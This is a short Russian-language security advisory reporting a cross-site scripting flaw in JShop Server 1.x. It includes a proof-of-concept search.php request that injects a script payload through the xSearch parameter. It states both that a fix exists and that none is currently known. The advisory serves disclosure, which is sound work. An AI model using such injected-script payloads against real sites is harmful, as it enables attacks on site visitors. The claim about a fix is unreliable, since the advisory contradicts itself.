Security Lab

Межсайтовый скриптинг в JShop

Дата публикации:12.02.2004
Всего просмотров:1011
Опасность:
Низкая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: JShop Server 1.x
Уязвимые версии: JShop

Описание: Уязвимость обнаружена в JShop. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

search.php?xSearch=%3Cscript%3Ealert%28document.domain%29 %3B%3C%2Fscrip%3E&submit=Search

URL производителя:http://jshop.co.uk/products_jss.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: JShop E-Commerce Vulnerability